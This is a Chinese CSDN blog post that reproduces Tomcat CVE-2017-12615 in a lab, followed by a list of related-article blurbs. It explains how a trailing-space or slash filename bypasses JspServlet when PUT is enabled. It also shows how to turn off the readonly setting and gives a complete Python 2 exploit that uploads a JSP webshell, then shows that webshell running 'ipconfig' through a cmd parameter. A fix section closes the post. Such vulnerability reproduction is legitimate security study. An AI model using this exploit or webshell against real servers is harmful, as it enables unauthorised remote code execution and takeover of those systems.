tomcat http status 400 – bad request_Tomcat-远程代码执行漏洞

最新推荐文章于 2024-06-28 16:11:10 发布
最新推荐文章于 2024-06-28 16:11:10 发布
阅读量415 收藏
点赞数
文章标签: tomcat http status 400 – bad request
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39967812/article/details/111358427
版权

漏洞原理

Tomcat的Servlet是在conf/web.xml配置的,通过配置文件可知,当后缀名为.jsp和.jspx的时候是通过JspServlet处理请求的,而其他的精通文件是通过DefaultServlet处理的可以得知:"1.jsp "(末尾有一个空格)并不能匹配到JspServlet,而是会交由DefaultServlet去处理当处理PUT请求时:会调用resources.bind:dirContext为FileDirContext:调用rebind创建文件又由于Windows不允许" "(空格)作为文件名结尾,所以会创建一个".jsp"文件,导致代码执行

漏洞环境

漏洞靶机 Win 2003x64 :192.168.136.136PC主机(Python环境) :192.168.1.103漏洞存在范围:Tomcat-7.0.0-Tomcat-7.0.81
4a7b044de1d6292f4e76c7ab28e8666a.png

环境搭建

win 2003x64 安装 Java环境Tomcat7.0.75下载:http://archive.apache.org/dist/tomcat/tomcat-7/v7.0.75/bin/apache-tomcat-7.0.75.exe
301bcd2cc0b9f1cbd428bfe3e8d2480c.png
56314b63ed7051cb83cb8e8529e388da.png

开启HTTP PUT

找到Tomcat的安装目录下的conf的web.xml

00210a0f23149fa58f5d44659a939f3e.png
afaf6242b8203262ad3a8f30ae4f4a6b.png 
readonly            Is this context "read only", so HTTPcommands like PUT and DELETE are rejected?  [true]   这个意思就是说:当前是只读模式,是不允许修改的

找到org.apache.catalina.servlets.DefaultServlet方法:

d89b7cf6b6b508ff23d60ab1b4db2563.png

添加如下代码并保存:

readonlyfalse
02250f9d805f35d0d30702e944e13c5a.png

修改完之后,重启Tomcat:

909a2cf0a3c82a6579b1ef5dd975e89e.png

漏洞复现

Python EXP:

#! -*- coding:utf-8 -*- import httplib import sys import time body = '''"+excuteCmd(request.getParameter("cmd"))+"
");}else{out.println("Test By Power_Liu");}%>''' try: conn = httplib.HTTPConnection(sys.argv[1]) conn.request(method='OPTIONS', url='/ffffzz') headers = dict(conn.getresponse().getheaders()) if 'allow' in headers and headers['allow'].find('PUT') > 0 : conn.close() conn = httplib.HTTPConnection(sys.argv[1]) url = "/" + str(int(time.time()))+'.jsp/' #url = "/" + str(int(time.time()))+'.jsp::$DATA' conn.request( method='PUT', url= url, body=body) res = conn.getresponse() if res.status == 201 : #print 'shell:', 'http://' + sys.argv[1] + url[:-7] print 'shell:', 'http://' + sys.argv[1] + url[:-1] elif res.status == 204 : print 'file exists' else: print 'error' conn.close() else: print 'Server not vulnerable' except Exception,e: print 'Error:', e

运行Python-EXP脚本:

python2 tomcat-CVE-2017-12615.py 192.168.136.136:8080得到的shell:http://192.168.136.136:8080/1574766773.jsp
d300a0c8e245449bb7c298dfc322e058.png

得到一枚Webshell:

773266fb1241a0cf478c70184a8338e2.png 
访问:http://192.168.136.136:8080/1574766773.jsp?pwd=hacker&cmd=ipconfig
c9e8f7e9f6e2f80f52d54cc9342dab4b.png

漏洞修复

将Tomcat更新到该漏洞被修复的版本(例如:Tomcat:8.5.23)readonlyinit-param不应该将false首先设置。如果该参数保留到默认(true),则攻击者无法上传文件。最后可以在前端安装WAF等防护软件来阻止PUT和DELETE请求。

weixin_39967812
关注
tomcat_redis_session-1.2_jb51.zip
06-02
tomcat-redis-session-1.2.zip tomcat7-redis-session.jar.zip tomcat7-redis-session-manager-master.jar.zip
tomcat http status 400 bad request_Tomcat爆出高危漏洞
weixin_39657125的博客
12-15 838
作者:Hu3sky@360CERT原文链接:https://www.anquanke.com/post/id/199448#h2-00x01 漏洞背景2020年02月20日, 360CERT 监测发现 国家信息安全漏洞共享平台(CNVD) 收录了 CNVD-2020-10487 Apache Tomcat文件包含漏洞Tomcat是由Apache软件基金会属下Jakarta项目开发的Ser...
JavaScript学习笔记(三十)——HTTPHTTPS
qq_45268602的博客
09-16 477
转载于:https://www.cnblogs.com/ok-lanyan/archive/2012/07/14/2591204.html HTTP HTTPS WebService HTTP是一个属于应用层的面向对象的协议,由于其简捷、快速的方式,适用于分布式超媒体信息系统。它于1990年提出,经过几年的使用与发展,得到不断地完善和扩展。目前在WWW中使用的是HTTP/1.0的第六版,HTTP/1.1的规范化工作正在进行之中,而且HTTP-NG(Next Generation of HTTP)的建议已经提
解决HTTP 400 Bad Request错误的方法
最新发布
技术研究中心
06-28 2678
解决HTTP 400 Bad Request错误的方法 大家好,我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿! 在进行网络通信时,HTTP 400 Bad Request错误是相对常见的问题之一。这种错误通常指示客户端发送的请求无效或格式错误,导致服务器无法理解并处理请求。本文将深入探讨HTTP 400错误的原因、常见解决方法以及在Java编程中如何处理和预防这类错误。 HTTP 400 Bad Request错误的原因 1. 请求参数错误 参
Tomcat PUT方法任意写漏洞复现
weixin_53696027的博客
02-12 806
CVE-2017-12616Tomcat PUT任意上传漏洞复现过程
picACG本地缓存目录_前端必备 Nginx 负载均衡和缓存实践
weixin_39673704的博客
11-18 865
基础篇一、环境服务器版本:CentOS 7.2为了保证学习阶段不遇到奇怪的事情,请保证以下四点(大神选择性无视)确认系统网络确认yum可用确认关闭iptables确认停用selinux#查看iptables状态安装一些系统基本工具,正常情况系统都会自带(没有在装哦)installgccgcc-c++autoconfpcrepcre-develmakeautomake二、Ng...
tomcat http status 400 bad request_刨根问底 HTTP 和 WebSocket 协议
weixin_39842029的博客
12-12 386
那天和boss聊天,不经意间提到了Meteor,然后聊到了WebSocket,然后就有了以下对话,不得不说,看问题的方式不同,看到的东西也会大不相同。A:Meteor是一个很新的开发框架,我觉得它设计得十分巧妙。B:怎么个巧妙之处?A:它的前后端全部使用JS,做到了真正的前后端统一;前端浏览器里存有一份后台开放出来的数据库的拷贝,快;使用WebSocket协议来做数据传输协议,来同步前后端的数据库...
Apache Tomcat CVE-2019-0232 远程代码执行漏洞 - tdcoming'blog QQ group 90
08-04
在2019年4月10日,Apache Tomcat官方发布了一个重要的安全公告,揭示了CVE-2019-0232漏洞,这是一个远程代码执行(RCE)漏洞,主要影响Windows平台上的Apache Tomcat实例。 **漏洞简介** CVE-2019-0232是一个由于...
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
【亲测】tomcat 请求url中带有特殊符号{} | 返回400的问题
月落星沉
11-29 2674
问题描述: 前台: HTTP Status 400 错误的请求 Type 异常报告 消息 Invalid character found in the request target. The valid characters are defined in RFC 7230 and RFC 3986 描述 由于被认为是客户端对错误(例如:畸形的请求语法、无效的请求信息帧或者虚拟的请求路...
Tomcat服务器无法运行,出现Bad Request (Invalid Hostname)错误
写意人生的专栏
03-26 6896
问题可能是Tomcat服务器默认的8080端口已经被占用,可采用修改Tomcat服务器端口的方法来解决。如何修改端口号? 1.找到Tomcat目录下的conf文件夹 2.进入conf文件夹里面找到server.xml文件 3.打开server.xml文件 4.在server.xml文件里面查找涉及到“8080”port的部分,修改为新端口号,如8088,并保存。 5.重新启动Tomcat
125,nginx+tomcat 配置https 出现400 Bad Request.问题 解决。
张震的博客
06-06 4183
简单介绍:1,nginz 1.4版本2,tomcat 9.0 版本3,证书由 letsencrypt 生成,免费的ov证书。问题描述:比如原来访问test.***.com/manage可以正常访问,配置https后浏览器直接输入test.***.com/manage 域名会自动变成http://test.haha.com:443/manage/  然后页面提示400 Bad Request,更神奇...
status“: 400, “error“: “Bad Request“,
热门推荐
Ghjkku的博客
09-28 7万+
代码】“status“: 400, “error“: “Bad Request“,
本地调试正确,测试环境报400bad request)的问题
jesseXu的博客
10-14 1811
出现问题原因: 是因为新版本tomcat不支持特殊字符的原因。 完整url如下: http://localhost:8080/bspDataService/downloadExcel.action?requestParam={modelid='052a05aa-d833-4c6e-810f-58bc36787ace',project='%25E7%259F%25BF%25E7%25BE%258E%...
tomcat405错误支持put请求
长春小佛爷的博客
04-15 656
在C:\apache-tomcat-8.5.50\conf\web.xml中。以使得tomcat支持put请求。
Tomcat HTTP Status 404 tomcat 404问题解决
m0_67400973的博客
04-27 1993
今天初次使用tomcat的时候,用浏览器访问总是不成功。经过一番周折总算成功了,虽然这个知识点不是很难,但还是写篇博客,希望能帮助那些初学者。(注:笔者用的是:tomcat 7) 前提:你的tomcat可以访问:http://localhost:8080/ 问题:当把项目发布到tomcat下并启动tomcat,可以访问8080端口,但是不能访问自己的页面。 请按照下面三个步骤一一来测试,相信你会得到你想要的结果。 一、查看自己的路径是否错误,正确的路径访问是:http://localhost:8080/xx
Java HTTP Status 400Bad Request问题解决
03-06
HTTP Status 400 - Bad Request表示客户端发送的请求有错误,服务器无法理解。下面是解决Java HTTP Status 400 - Bad Request问题的一些常见方法: 1. 检查请求参数:确保请求参数的格式正确,并且符合服务器的要求...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值